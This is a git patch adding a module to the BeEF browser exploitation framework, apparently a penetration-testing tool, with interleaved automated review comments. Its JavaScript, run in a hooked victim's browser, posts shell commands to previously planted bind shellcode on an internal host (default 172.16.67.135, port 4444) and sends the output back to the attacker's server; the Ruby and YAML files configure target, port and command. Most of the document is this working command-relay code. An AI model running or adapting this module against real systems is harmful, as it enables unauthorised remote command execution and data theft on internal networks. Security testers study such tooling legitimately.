From 79bf6f4a9f654979c168f37d896147b49368b956 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Mon, 22 Oct 2012 16:07:31 +1100
Subject: [PATCH] Added BeEF_bind send_command module: this is used to communicate with the BeEF_bind shellcode (including in the IPEC admin_ui shell).
---
 .../beefbind/beef_bind_shell/command.js | 95 +++++++++++++++++++
 .../beefbind/beef_bind_shell/config.yaml | 25 +++++
 .../beefbind/beef_bind_shell/module.rb | 31 ++++++
 3 files changed, 151 insertions(+)
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/command.js
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/config.yaml
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/module.rb
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
new file mode 100755
index 000000000..288e42f09
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -0,0 +1,95 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function () {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var path = '<%= @path %>';
+ var cmd = '<%= @cmd %>';
+
+ var uri = "http://" + rhost + ":" + rport + path;
+
+ strip_output = function(output){
+
+ var offset = 0;
+ for(var c in output){
+ c = output.charAt(c);
+ if(c.charCodeAt(0) == 0){
+ break;
+ }
+ offset++;
+ }
+ return output.substring(0,offset);
+ };
+
+ var counter = 0;
+ get_additional_cmd_results = function(){
+ xhr = new XMLHttpRequest();
+ xhr.onreadystatechange = function(){
+ if(xhr.readyState == 4){
+ var result = strip_output(xhr.responseText);
+ console.log("result.length: " + result.length);
+ if(result.length != 0){
+ console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
+ counter++;
+ setTimeout("get_additional_cmd_results()",500);
+ }
+ }else{ // No more command results, ready to send another command.
+ console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+ }
+ };
+ xhr.open("GET", uri, false);
+ xhr.send(null);
+ };
+
+ get_prompt = function () {
+
+ xhr = new XMLHttpRequest();
+ xhr.onreadystatechange = function(){
+ if(xhr.readyState == 4){
+ console.log("get_prompt: Retrieved prompt");
+ var prompt = strip_output(xhr.responseText);
+ console.log(prompt);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
+
+ //send command
+ send_command(cmd);
+ }
+ };
+ xhr.open("GET", uri, false);
+ xhr.send(null);
+ };
+
+ send_command = function(command){
+ xhr = new XMLHttpRequest();
+ xhr.onreadystatechange = function(){
+ var cmd_result = strip_output(xhr.responseText);
+ console.log(cmd_result);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
+ };
+ xhr.open("POST", uri, false);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+ command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+ xhr.send(command);
+ setTimeout("get_additional_cmd_results()",500);
+ };
+
+
+
+get_prompt();
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
new file mode 100755
index 000000000..9ce2708a9
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
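Review bot: The `onreadystatechange` handler in `send_command` has no `readyState` check, unlike the handlers in `get_prompt` and `get_additional_cmd_results`, so it runs on every intermediate state and calls `beef.net.send` with an empty or partial `responseText` for the same command more than once. Add `if(xhr.readyState != 4){ return; }` as the first line of that handler. `strip_output`, `get_additional_cmd_results`, `get_prompt`, `send_command` and `xhr` are assigned without `var`, so they leak out of the `beef.execute` closure as globals of the hooked page, and `setTimeout("get_additional_cmd_results()",500)` relies on that; declaring them with `var` and scheduling with `setTimeout(get_additional_cmd_results, 500)` keeps them local. The `<%= @cmd %>` value (and the other option values) is placed into a single-quoted JS literal with no escaping, so a quote in the option breaks the generated script; it should be JS-string-escaped before interpolation.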
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ BeEF_bind_shell:
+ enable: true
+ category: ["Exploits", "BeEF_bind"]
+ name: "BeEF bind shell"
+ description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
+ authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+ target:
+ working: ["FF","C","S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
new file mode 100755
index 000000000..30e7d174a
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Beef_bind_shell < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '172.16.67.135'},
+ { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+ { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+ { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
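Review bot: `self.options` ships `'172.16.67.135'` as the default for `rhost`, a specific lab address rather than a neutral placeholder, so a run with untouched options points at that host; a default of `''` (or `'127.0.0.1'`) makes the operator set it deliberately. The class also carries no comment that `rhost`, `rport`, `path` and `cmd` are substituted verbatim into string literals in the module's `command.js`, which is the contract anyone adding input validation here needs to know; a one-line comment above `self.options` such as `# option values are interpolated unescaped into command.js string literals` would record it.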